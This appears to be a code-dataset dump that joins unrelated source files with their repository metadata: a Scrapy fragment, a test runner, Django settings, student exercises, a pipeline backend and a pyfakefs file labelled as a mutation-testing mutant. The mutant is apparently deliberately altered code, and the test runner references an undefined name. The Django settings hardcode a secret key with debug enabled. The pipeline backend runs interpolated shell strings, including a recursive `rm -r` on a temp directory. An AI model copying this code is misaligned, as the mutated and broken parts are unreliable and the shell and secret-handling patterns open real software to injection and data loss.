item[id_field] = hashlib.md5(id_component.encode('utf8')).hexdigest()
return item
def parse(self, response):
'''
完成响应的数据解析
:param self: 类的对象本身
:param response: Scrapy 框架返回的响应
:return: item
:raise: NotImplementedError 本类别作为抽象类使用,并不实例化
'''
raise NotImplementedError
| [
"118319592@qq.com"
] | 118319592@qq.com |
2b242c84ce23da01b9930b418607811c97947727 | 2bb607a8b92cc4014d9e3e4368019a20442fd6ac | /TestRunner.py | 05a21e6e452422bb9d4f6b6da7240b9b68e9a135 | [] | no_license | 164461130/selenium-UI-Python- | 55c47d4dddf2181fb96afcb36d378428fa50681d | 2bf7e65558c825ffd0aef541a14107de27b3de10 | refs/heads/master | 2020-04-14T11:24:20.932244 | 2018-12-12T10:05:50 | 2018-12-12T10:05:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 402 | py | # -*- encoding: utf-8 -*-
# @Time : 2017/12/25 14:31
# @Author : mike.liu
# @File : TestRunner.py
import unittest
from testcase.test_chromeTest import BrowserTest
if __name__=='__main__':
suite = unittest.TestSuite()
suite.addTest(test_firefox('test_chrome'))
suite.addTest(BrowserTest('test_firefox'))
#执行用例
runner=unittest.TextTestRunner()
runner.run(suite) | [
"mike.liu@jinfuzi.com"
] | mike.liu@jinfuzi.com |
7db5a055b747a9055b13854037975cec49b0449a | 960dd60c263cea329e27584b03bb430b025fe05a | /venv/bin/gunicorn | f81ebcc4a2bdfc6d083fcd3c5c9594788335a80b | [] | no_license | RuchiBhardwaj/covid_pipeline | 18b3c0ae5836487b150ad112d86e312544d19f9d | f21a98593383caed532b9e7178e70172984cd635 | refs/heads/master | 2022-12-04T09:02:47.076901 | 2020-06-08T14:12:18 | 2020-06-08T14:12:18 | 268,835,744 | 0 | 2 | null | 2022-11-27T19:32:17 | 2020-06-02T15:17:20 | Python | UTF-8 | Python | false | false | 267 | #!/home/nineleaps/PycharmProjects/COVID19_Airflow/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from gunicorn.app.wsgiapp import run
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(run())
| [
"ruchi.bhardwaj@nineleaps.com"
] | ruchi.bhardwaj@nineleaps.com | |
da7b85fc67c7bfadaab88cc1238a1038576a4cad | bdda06ffbbd49c63a84fbc3bb26a55842d2b2d0a | /mysite/settings.py | 8de5512eefee0dd550c30e69c67f04291c4e0276 | [] | no_license | todqabb/my-first-blog | f820bef4321e06b20fa1e91dc9c9c5d0aaa7cd82 | 67b4dd4b442094ba372e5e2d36fff005159850f7 | refs/heads/master | 2021-01-20T05:22:08.840767 | 2017-08-25T20:22:16 | 2017-08-25T20:22:16 | 101,439,885 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,200 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 1.11.4.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'ko)ab0)2k5w-6vsct0j--9sp3811_gsa#l_8xe3q04c@f3u4l7'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['127.0.0.1', '.pythonanywhere.com']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Europe/Budapest'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
| [
"you@example.com"
] | you@example.com |
1117dbbdc89478fcc9b3f3855a551f66657818bc | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/30/usersdata/73/9601/submittedfiles/atividade.py | ac54c0c02c33500bfc7f846ac89beb1e400e1c04 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 198 | py | # -*- coding: utf-8 -*-
from __future__ import division
import math
n = input ('digite o valor de n:')
soma = 0
for i in range (1,n+1,1):
a = i/(n+1-i)
soma = soma + a
print ('%.5f' %soma )
| [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
b025942a885c51b7cba68983e10da3229b4c6dd2 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03474/s139736591.py | 35fd766d01c43ff1779773d47e9f0d978ed03fe3 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 305 | py | a,b = map(int,input().split())
s = list(input())
cnt = 0
num = list("0123456789")
for i in range(a):
if s[i] in num:
cnt += 1
if s[a] == "-":
cnt += 1
for i in range(b):
if s[i+a+1] in num:
cnt += 1
if cnt == a+b+1:
print("Yes")
else:
print("No") | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
8d3edda1cc082f4a48eafa8db8ef84b771cd96ae | c73b9c944deb7d0c564dcefc3fe30fbf0f69e47d | /pipeline/pipeline/backend.py | 5a51e23c0d2fbe7572724f72d786690d3045cecf | [
"MIT"
] | permissive | atgenomix/hail | 46e3edcea33a86184462f6ef0f354ea0239cd0dc | ceb85fc87544b5dceabe64213e3c5acaaae6a05e | refs/heads/master | 2021-06-19T07:48:42.503150 | 2019-02-22T04:09:30 | 2019-02-22T04:09:30 | 171,826,476 | 1 | 0 | MIT | 2019-02-21T07:57:38 | 2019-02-21T07:57:37 | null | UTF-8 | Python | false | false | 2,906 | py | import abc
import os
import subprocess as sp
from .resource import Resource, ResourceGroup
from .utils import get_sha, escape_string
class Backend:
@abc.abstractmethod
def tmp_dir(self):
return
@abc.abstractmethod
def run(self, pipeline, dry_run, verbose, bg, delete_on_exit):
return
@abc.abstractmethod
def copy(self, src, dest):
return
class LocalBackend(Backend):
def __init__(self, tmp_dir='/tmp/'):
self._tmp_dir = tmp_dir
def run(self, pipeline, dry_run, verbose, bg, delete_on_exit):
tmpdir = self.tmp_dir()
script = ['#!/bin/bash',
'set -e' + 'x' if verbose else '',
'\n',
'# change cd to tmp directory',
f"cd {tmpdir}",
'\n']
def define_resource(r):
if isinstance(r, str):
r = pipeline._resource_map[r]
if isinstance(r, Resource):
assert r._value is not None
init = f"{r._uid}={escape_string(r._value)}"
else:
assert isinstance(r, ResourceGroup)
init = f"{r._uid}={escape_string(r._root)}"
return init
for task in pipeline._tasks:
script.append(f"# {task._uid} {task._label if task._label else ''}")
resource_defs = [define_resource(r) for _, r in task._resources.items()]
if task._docker:
defs = '; '.join(resource_defs) + '; ' if resource_defs else ''
cmd = "&& ".join(task._command)
image = task._docker
script += [f"docker run "
f"-v {tmpdir}:{tmpdir} "
f"-w {tmpdir} "
f"{image} /bin/bash "
f"-c {escape_string(defs + cmd)}",
'\n']
else:
script += resource_defs
script += task._command + ['\n']
script = "\n".join(script)
if dry_run:
print(script)
else:
try:
sp.check_output(script, shell=True) # FIXME: implement non-blocking (bg = True)
except sp.CalledProcessError as e:
print(e.output)
raise e
finally:
if delete_on_exit:
sp.run(f'rm -r {tmpdir}', shell=True)
def tmp_dir(self):
def _get_random_name():
directory = self._tmp_dir + '/pipeline.{}/'.format(get_sha(8))
if os.path.isdir(directory):
return _get_random_name()
else:
os.makedirs(directory, exist_ok=True)
return directory
return _get_random_name()
def copy(self, src, dest): # FIXME: symbolic links? support gsutil?
return f"cp {src} {dest}"
| [
"daniel.zidan.king@gmail.com"
] | daniel.zidan.king@gmail.com |
19fadc6bd0dcb196c68d7e3ac27319302057be8f | e349a8dba0356f9ba252df905f563944750d989a | /scripts/flix.py | ea8aa9f3358bb44e41dedfe2f0bbe0bfb1387917 | [
"MIT"
] | permissive | jaebradley/flix | 49ebe12ae0b53c8c004d403d424478997085e397 | adc02c2f08d01e1acd6f18065be70a8c87e71e55 | refs/heads/master | 2022-12-12T20:15:18.697554 | 2017-06-13T12:38:17 | 2017-06-13T12:38:17 | 93,294,294 | 1 | 0 | MIT | 2022-12-07T23:58:05 | 2017-06-04T06:17:12 | Python | UTF-8 | Python | false | false | 1,547 | py | import click
from data.exceptions import InvalidDateException
from data.time import get_date
from data.services import fetch_parsed_theater_data
from tables.builders import build_table
MONTH_CHOICES = [
"jan", "feb", "mar", "apr", "may", "jun", "jul", "aug", "sep", "oct", "nov", "dec",
"1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "11", "12"
]
DAY_CHOICES = ["mon", "tue", "wed", "thu", "fri", "sat", "sun",
"1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "11", "12", "13", "14", "15",
"16", "17", "18", "19", "20", "21", "22", "23", "24", "25", "26", "27", "28", "29", "30", "31"]
@click.command()
@click.option("-n", "--name")
@click.option("-t", "--tomorrow", is_flag=True)
@click.option("-m", "--month", type=click.Choice(MONTH_CHOICES))
@click.option("-d", "--day", type=click.Choice(DAY_CHOICES))
@click.option("-l", "--limit", default="2", type=click.Choice(["1", "2", "3", "4", "5"]))
def flix(name, tomorrow, month, day, limit):
try:
try:
date = get_date(use_tomorrow=tomorrow, month=month, day=day)
except InvalidDateException:
click.echo("Invalid date inputs")
return
movie_presentations = fetch_parsed_theater_data(start_date=date, movie_name=name, limit=limit)
if len(movie_presentations.movie_presentations_mapping.keys()) > 0:
click.echo(build_table(movie_presentations))
else:
click.echo("No flix found")
except Exception:
click.echo("Unable to show any flix")
| [
"jae.b.bradley@gmail.com"
] | jae.b.bradley@gmail.com |
2bb2717658bda0e645599dbf83db02d5fce1ebde | 3c934c97bd5748237ac8963c8be779a7d77be629 | /maximumConsecOne.py | 7c8085c860f9b9639124b62b613e6cbd31879ac1 | [] | no_license | Franktian/leetcode | 2b0d0280d18e3401b9f337f027c5d70f26237f02 | 98e7852ba144cefbdb02f705651b1519155ee4d6 | refs/heads/master | 2021-06-12T15:23:09.733650 | 2020-06-17T23:09:18 | 2020-06-17T23:09:18 | 128,710,359 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 295 | py | def findMaxConsecutiveOnes(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
res = 0
curr = 0
for n in nums:
if n == 1:
curr += 1
else:
curr = 0
if curr >= res:
res = curr
return res
| [
"tianyawen201209@hotmail.com"
] | tianyawen201209@hotmail.com |
2b0c2dda599c2b9101d263bb3608cffc7638a3e8 | 757e3de38040878588bfcc846ec87a34740313a3 | /cap_07_iteracao/Lista_Fábio_03_em_for/fabio_iteracao_Q05_fatorial.py | a7ef9b3b83716cd9d39aef8b5d30c39c52b8871b | [] | no_license | Emanuelvss13/ifpi-ads-algoritimos2020 | c0a4a76ce3c41ae945f1ba31719eb68a539a9c9c | ac693feb1eee67f7c816b2ed34d44f3fd939653d | refs/heads/master | 2021-03-06T05:32:37.040171 | 2021-02-03T23:46:24 | 2021-02-03T23:46:24 | 246,182,570 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 274 | py | def main():
numero = int(input('Digite um número: '))
fatorial = 1
numero_print =numero
for i in range(numero):
fatorial = fatorial * numero
numero -= 1
print(f'O fatorial de {numero_print} é : {fatorial}')
main() | [
"noreply@github.com"
] | Emanuelvss13.noreply@github.com |
95c86090162ab6cb8421e44e90c343841b3f6fc5 | dea198896f679e577a3fd0923e3fa4470da4b9cc | /journal/pyfakefs_mutants/AOR_BinOp_mutant_1507055069.py | eaf2e0c6399a4965c761b6dcf23493c50a49d7be | [] | no_license | naustarg/cbmcmutate | f138ab2b04b4be70d735de90815ac670ae6042ce | a6ee6fd395338bb2dfd6bdffabb2dc484cb303f1 | refs/heads/master | 2020-04-04T08:10:15.913309 | 2018-05-21T18:23:58 | 2018-05-21T18:23:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 219,331 | py | # line: 91
'A fake filesystem implementation for unit testing.\n\n:Includes:\n * FakeFile: Provides the appearance of a real file.\n * FakeDirectory: Provides the appearance of a real directory.\n * FakeFilesystem: Provides the appearance of a real directory hierarchy.\n * FakeOsModule: Uses FakeFilesystem to provide a fake os module replacement.\n * FakePathModule: Faked os.path module replacement.\n * FakeFileOpen: Faked file() and open() function replacements.\n\n:Usage:\n\n>>> from pyfakefs import fake_filesystem\n>>> filesystem = fake_filesystem.FakeFilesystem()\n>>> os_module = fake_filesystem.FakeOsModule(filesystem)\n>>> pathname = \'/a/new/dir/new-file\'\n\nCreate a new file object, creating parent directory objects as needed:\n\n>>> os_module.path.exists(pathname)\nFalse\n>>> new_file = filesystem.CreateFile(pathname)\n\nFile objects can\'t be overwritten:\n\n>>> os_module.path.exists(pathname)\nTrue\n>>> try:\n... filesystem.CreateFile(pathname)\n... except IOError as e:\n... assert e.errno == errno.EEXIST, \'unexpected errno: %d\' % e.errno\n... assert e.strerror == \'File already exists in fake filesystem\'\n\nRemove a file object:\n\n>>> filesystem.RemoveObject(pathname)\n>>> os_module.path.exists(pathname)\nFalse\n\nCreate a new file object at the previous path:\n\n>>> beatles_file = filesystem.CreateFile(pathname,\n... contents=\'Dear Prudence\\nWon\\\'t you come out to play?\\n\')\n>>> os_module.path.exists(pathname)\nTrue\n\nUse the FakeFileOpen class to read fake file objects:\n\n>>> file_module = fake_filesystem.FakeFileOpen(filesystem)\n>>> for line in file_module(pathname):\n... print(line.rstrip())\n...\nDear Prudence\nWon\'t you come out to play?\n\nFile objects cannot be treated like directory objects:\n\n>>> os_module.listdir(pathname) #doctest: +NORMALIZE_WHITESPACE\nTraceback (most recent call last):\n File "fake_filesystem.py", line 291, in listdir\n raise OSError(errno.ENOTDIR,\nOSError: [Errno 20] Fake os module: not a directory: \'/a/new/dir/new-file\'\n\nThe FakeOsModule can list fake directory objects:\n\n>>> os_module.listdir(os_module.path.dirname(pathname))\n[\'new-file\']\n\nThe FakeOsModule also supports stat operations:\n\n>>> import stat\n>>> stat.S_ISREG(os_module.stat(pathname).st_mode)\nTrue\n>>> stat.S_ISDIR(os_module.stat(os_module.path.dirname(pathname)).st_mode)\nTrue\n'
# line: 92
import codecs
# line: 93
import errno
# line: 94
import heapq
# line: 95
import io
# line: 96
import locale
# line: 97
import platform
# line: 98
import os
# line: 99
import sys
# line: 100
import time
# line: 101
import warnings
# line: 103
from collections import namedtuple
# line: 105
import stat
# line: 106
from copy import copy
# line: 108
__pychecker__ = 'no-reimportself'
# line: 110
__version__ = '3.3'
# line: 112
PERM_READ = 256
# line: 113
PERM_WRITE = 128
# line: 114
PERM_EXE = 64
# line: 115
PERM_DEF = 511
# line: 116
PERM_DEF_FILE = 438
# line: 117
PERM_ALL = 4095
# line: 119
_OpenModes = namedtuple('open_modes', 'must_exist can_read can_write truncate append must_not_exist')
# line: 125
_OPEN_MODE_MAP = {'r': (True, True, False, False, False, False), 'w': (False, False, True, True, False, False), 'a': (False, False, True, False, True, False), 'r+': (True, True, True, False, False, False), 'w+': (False, True, True, True, False, False), 'a+': (False, True, True, False, True, False), }
# line: 136
if ((sys.version_info[0] < 3) and (sys.platform != 'win32')):
# line: 137
_OPEN_MODE_MAP['rw'] = (True, True, True, False, False, False)
# line: 139
if (sys.version_info >= (3, 3)):
# line: 140
_OPEN_MODE_MAP['x'] = (False, False, True, False, False, True)
# line: 141
_OPEN_MODE_MAP['x+'] = (False, True, True, False, False, True)
# line: 143
if sys.platform.startswith('linux'):
# line: 146
_MAX_LINK_DEPTH = 40
else:
# line: 149
_MAX_LINK_DEPTH = 32
# line: 151
FAKE_PATH_MODULE_DEPRECATION = 'Do not instantiate a FakePathModule directly; let FakeOsModule instantiate it. See the FakeOsModule docstring for details.'
# line: 155
if (sys.platform == 'win32'):
# line: 157
OSError = WindowsError
# line: 160
class FakeLargeFileIoException(Exception):
# line: 163
'Exception thrown on unsupported operations for fake large files.\n Fake large files have a size with no real content.\n '
# line: 165
def __init__(self, file_path):
# line: 166
super(FakeLargeFileIoException, self).__init__(('Read and write operations not supported for fake large file: %s' % file_path))
# line: 171
def CopyModule(old):
# line: 172
'Recompiles and creates new module object.'
# line: 173
saved = sys.modules.pop(old.__name__, None)
# line: 174
new = __import__(old.__name__)
# line: 175
sys.modules[old.__name__] = saved
# line: 176
return new
# line: 179
class _FakeStatResult(object):
# line: 183
'Mimics os.stat_result for use as return type of `stat()` and similar.\n This is needed as `os.stat_result` has no possibility to set\n nanosecond times directly.\n '
# line: 184
long_type = (long if (sys.version_info < (3,)) else int)
# line: 186
def __init__(self, initial_time=None):
# line: 187
self.use_float = FakeOsModule.stat_float_times
# line: 188
self.st_mode = None
# line: 189
self.st_ino = None
# line: 190
self.st_dev = None
# line: 191
self.st_nlink = 0
# line: 192
self.st_uid = None
# line: 193
self.st_gid = None
# line: 194
self.st_size = None
# line: 195
if (initial_time is not None):
# line: 196
self._st_atime_ns = self.long_type((initial_time * 1000000000.0))
else:
# line: 198
self._st_atime_ns = None
# line: 199
self._st_mtime_ns = self._st_atime_ns
# line: 200
self._st_ctime_ns = self._st_atime_ns
# line: 202
def __eq__(self, other):
# line: 203
return (isinstance(other, _FakeStatResult) and (self._st_atime_ns == other._st_atime_ns) and (self._st_ctime_ns == other._st_ctime_ns) and (self._st_mtime_ns == other._st_mtime_ns) and (self.st_size == other.st_size) and (self.st_gid == other.st_gid) and (self.st_uid == other.st_uid) and (self.st_nlink == other.st_nlink) and (self.st_dev == other.st_dev) and (self.st_ino == other.st_ino) and (self.st_mode == other.st_mode))
# line: 217
def __ne__(self, other):
# line: 218
return (not (self == other))
# line: 220
def copy(self):
# line: 223
'Return a copy where the float usage is hard-coded to mimic the behavior\n of the real os.stat_result.\n '
# line: 224
use_float = self.use_float()
# line: 225
stat_result = copy(self)
# line: 226
stat_result.use_float = (lambda : use_float)
# line: 227
return stat_result
# line: 229
def set_from_stat_result(self, stat_result):
# line: 233
'Set values from a real os.stat_result.\n Note: values that are controlled by the fake filesystem are not set.\n This includes st_ino, st_dev and st_nlink.\n '
# line: 234
self.st_mode = stat_result.st_mode
# line: 235
self.st_uid = stat_result.st_uid
# line: 236
self.st_gid = stat_result.st_gid
# line: 237
self.st_size = stat_result.st_size
# line: 238
if (sys.version_info < (3, 3)):
# line: 239
self._st_atime_ns = self.long_type((stat_result.st_atime * 1000000000.0))
# line: 240
self._st_mtime_ns = self.long_type((stat_result.st_mtime * 1000000000.0))
# line: 241
self._st_ctime_ns = self.long_type((stat_result.st_ctime * 1000000000.0))
else:
# line: 243
self._st_atime_ns = stat_result.st_atime_ns
# line: 244
self._st_mtime_ns = stat_result.st_mtime_ns
# line: 245
self._st_ctime_ns = stat_result.st_ctime_ns
# line: 247
@property
# line: 247
def st_ctime(self):
# line: 249
'Return the creation time in seconds.'
# line: 250
ctime = (self._st_ctime_ns / 1000000000.0)
# line: 251
return (ctime if self.use_float() else int(ctime))
# line: 253
@property
# line: 253
def st_atime(self):
# line: 255
'Return the access time in seconds.'
# line: 256
atime = (self._st_atime_ns / 1000000000.0)
# line: 257
return (atime if self.use_float() else int(atime))
# line: 259
@property
# line: 259
def st_mtime(self):
# line: 261
'Return the modification time in seconds.'
# line: 262
mtime = (self._st_mtime_ns / 1000000000.0)
# line: 263
return (mtime if self.use_float() else int(mtime))
# line: 265
@st_ctime.setter
# line: 265
def st_ctime(self, val):
# line: 267
'Set the creation time in seconds.'
# line: 268
self._st_ctime_ns = self.long_type((val * 1000000000.0))
# line: 270
@st_atime.setter
# line: 270
def st_atime(self, val):
# line: 272
'Set the access time in seconds.'
# line: 273
self._st_atime_ns = self.long_type((val * 1000000000.0))
# line: 275
@st_mtime.setter
# line: 275
def st_mtime(self, val):
# line: 277
'Set the modification time in seconds.'
# line: 278
self._st_mtime_ns = self.long_type((val * 1000000000.0))
# line: 280
def __getitem__(self, item):
# line: 281
'Implement item access to mimic `os.stat_result` behavior.'
# line: 282
if (item == stat.ST_MODE):
# line: 283
return self.st_mode
# line: 284
if (item == stat.ST_INO):
# line: 285
return self.st_ino
# line: 286
if (item == stat.ST_DEV):
# line: 287
return self.st_dev
# line: 288
if (item == stat.ST_NLINK):
# line: 289
return self.st_nlink
# line: 290
if (item == stat.ST_UID):
# line: 291
return self.st_uid
# line: 292
if (item == stat.ST_GID):
# line: 293
return self.st_gid
# line: 294
if (item == stat.ST_SIZE):
# line: 295
return self.st_size
# line: 296
if (item == stat.ST_ATIME):
# line: 298
return int(self.st_atime)
# line: 299
if (item == stat.ST_MTIME):
# line: 300
return int(self.st_mtime)
# line: 301
if (item == stat.ST_CTIME):
# line: 302
return int(self.st_ctime)
# line: 304
if (sys.version_info >= (3, 3)):
# line: 306
@property
# line: 306
def st_atime_ns(self):
# line: 308
'Return the access time in nanoseconds.'
# line: 309
return self._st_atime_ns
# line: 311
@property
# line: 311
def st_mtime_ns(self):
# line: 313
'Return the modification time in nanoseconds.'
# line: 314
return self._st_mtime_ns
# line: 316
@property
# line: 316
def st_ctime_ns(self):
# line: 318
'Return the creation time in nanoseconds.'
# line: 319
return self._st_ctime_ns
# line: 321
@st_atime_ns.setter
# line: 321
def st_atime_ns(self, val):
# line: 323
'Set the access time in nanoseconds.'
# line: 324
self._st_atime_ns = val
# line: 326
@st_mtime_ns.setter
# line: 326
def st_mtime_ns(self, val):
# line: 328
'Set the modification time of the fake file in nanoseconds.'
# line: 329
self._st_mtime_ns = val
# line: 331
@st_ctime_ns.setter
# line: 331
def st_ctime_ns(self, val):
# line: 333
'Set the creation time of the fake file in nanoseconds.'
# line: 334
self._st_ctime_ns = val
# line: 337
class FakeFile(object):
# line: 353
"Provides the appearance of a real file.\n\n Attributes currently faked out:\n st_mode: user-specified, otherwise S_IFREG\n st_ctime: the time.time() timestamp of the file change time (updated\n each time a file's attributes is modified).\n st_atime: the time.time() timestamp when the file was last accessed.\n st_mtime: the time.time() timestamp when the file was last modified.\n st_size: the size of the file\n st_nlink: the number of hard links to the file\n st_ino: the inode number - a unique number identifying the file\n st_dev: a unique number identifying the (fake) file system device the file belongs to\n\n Other attributes needed by os.stat are assigned default value of None\n these include: st_uid, st_gid\n "
# line: 355
def __init__(self, name, st_mode=(stat.S_IFREG | PERM_DEF_FILE), contents=None, filesystem=None, encoding=None, errors=None):
# line: 371
'init.\n\n Args:\n name: name of the file/directory, without parent path information\n st_mode: the stat.S_IF* constant representing the file type (i.e.\n stat.S_IFREG, stat.S_IFDIR)\n contents: the contents of the filesystem object; should be a string or byte object for\n regular files, and a list of other FakeFile or FakeDirectory objects\n for FakeDirectory objects\n filesystem: the fake filesystem where the file is created.\n New in pyfakefs 2.9.\n encoding: if contents is a unicode string, the encoding used for serialization\n errors: the error mode used for encoding/decoding errors\n New in pyfakefs 3.2.\n '
# line: 372
self.name = name
# line: 373
self.stat_result = _FakeStatResult(time.time())
# line: 374
self.stat_result.st_mode = st_mode
# line: 375
self.encoding = encoding
# line: 376
self.errors = (errors or 'strict')
# line: 377
self._byte_contents = self._encode_contents(contents)
# line: 378
self.stat_result.st_size = (len(self._byte_contents) if (self._byte_contents is not None) else 0)
# line: 381
if (filesystem is None):
# line: 382
raise ValueError('filesystem shall not be None')
# line: 383
self.filesystem = filesystem
# line: 384
self.epoch = 0
# line: 385
self.parent_dir = None
# line: 387
@property
# line: 387
def byte_contents(self):
# line: 389
return self._byte_contents
# line: 391
@property
# line: 391
def contents(self):
# line: 393
'Return the contents as string with the original encoding.'
# line: 394
if ((sys.version_info >= (3, 0)) and isinstance(self.byte_contents, bytes)):
# line: 395
return self.byte_contents.decode((self.encoding or locale.getpreferredencoding(False)), errors=self.errors)
# line: 398
return self.byte_contents
# line: 400
def SetLargeFileSize(self, st_size):
# line: 413
"Sets the self.st_size attribute and replaces self.content with None.\n\n Provided specifically to simulate very large files without regards\n to their content (which wouldn't fit in memory).\n Note that read/write operations with such a file raise FakeLargeFileIoException.\n\n Args:\n st_size: (int) The desired file size\n\n Raises:\n IOError: if the st_size is not a non-negative integer,\n or if st_size exceeds the available file system space\n "
# line: 414
self._check_positive_int(st_size)
# line: 415
if self.st_size:
# line: 416
self.SetSize(0)
# line: 417
self.filesystem.ChangeDiskUsage(st_size, self.name, self.st_dev)
# line: 418
self.st_size = st_size
# line: 419
self._byte_contents = None
# line: 421
def _check_positive_int(self, size):
# line: 423
int_types = ((int, long) if (sys.version_info < (3, 0)) else int)
# line: 424
if ((not isinstance(size, int_types)) or (size < 0)):
# line: 425
raise IOError(errno.ENOSPC, ('Fake file object: size must be a non-negative integer, but is %s' % size), self.name)
# line: 429
def IsLargeFile(self):
# line: 430
'Return True if this file was initialized with size but no contents.'
# line: 431
return (self._byte_contents is None)
# line: 433
def _encode_contents(self, contents):
# line: 435
if ((sys.version_info >= (3, 0)) and isinstance(contents, str)):
# line: 436
contents = bytes(contents, (self.encoding or locale.getpreferredencoding(False)), self.errors)
elif ((sys.version_info < (3, 0)) and isinstance(contents, unicode)):
# line: 438
contents = contents.encode((self.encoding or locale.getpreferredencoding(False)), self.errors)
# line: 439
return contents
# line: 441
def _set_initial_contents(self, contents):
# line: 450
'Sets the file contents and size.\n Called internally after initial file creation.\n\n Args:\n contents: string, new content of file.\n Raises:\n IOError: if the st_size is not a non-negative integer,\n or if st_size exceeds the available file system space\n '
# line: 451
contents = self._encode_contents(contents)
# line: 452
st_size = len(contents)
# line: 454
if self._byte_contents:
# line: 455
self.SetSize(0)
# line: 456
current_size = (self.st_size or 0)
# line: 457
self.filesystem.ChangeDiskUsage((st_size - current_size), self.name, self.st_dev)
# line: 458
self._byte_contents = contents
# line: 459
self.st_size = st_size
# line: 460
self.epoch += 1
# line: 462
def SetContents(self, contents, encoding=None):
# line: 475
'Sets the file contents and size and increases the modification time.\n\n Args:\n contents: (str, bytes, unicode) new content of file.\n encoding: (str) the encoding to be used for writing the contents\n if they are a unicode string.\n If not given, the locale preferred encoding is used.\n New in pyfakefs 2.9.\n\n Raises:\n IOError: if the st_size is not a non-negative integer,\n or if st_size exceeds the available file system space.\n '
# line: 476
self.encoding = encoding
# line: 477
self._set_initial_contents(contents)
# line: 478
current_time = time.time()
# line: 479
self.st_ctime = current_time
# line: 480
self.st_mtime = current_time
# line: 482
def GetSize(self):
# line: 485
'Returns the size in bytes of the file contents.\n New in pyfakefs 2.9.\n '
# line: 486
return self.st_size
# line: 488
def GetPath(self):
# line: 489
'Return the full path of the current object.'
# line: 490
names = []
# line: 491
obj = self
# line: 492
while obj:
# line: 493
names.insert(0, obj.name)
# line: 494
obj = obj.parent_dir
# line: 495
sep = self.filesystem._path_separator(self.name)
# line: 496
return self.filesystem.NormalizePath(sep.join(names[1:]))
# line: 498
def SetSize(self, st_size):
# line: 507
'Resizes file content, padding with nulls if new size exceeds the old.\n\n Args:\n st_size: The desired size for the file.\n\n Raises:\n IOError: if the st_size arg is not a non-negative integer\n or if st_size exceeds the available file system space\n '
# line: 509
self._check_positive_int(st_size)
# line: 510
current_size = (self.st_size or 0)
# line: 511
self.filesystem.ChangeDiskUsage((st_size - current_size), self.name, self.st_dev)
# line: 512
if self._byte_contents:
# line: 513
if (st_size < current_size):
# line: 514
self._byte_contents = self._byte_contents[:st_size]
elif (sys.version_info < (3, 0)):
# line: 517
self._byte_contents = ('%s%s' % (self._byte_contents, ('\x00' * (st_size - current_size))))
else:
# line: 520
self._byte_contents += ('\x00' * (st_size - current_size))
# line: 521
self.st_size = st_size
# line: 522
self.epoch += 1
# line: 524
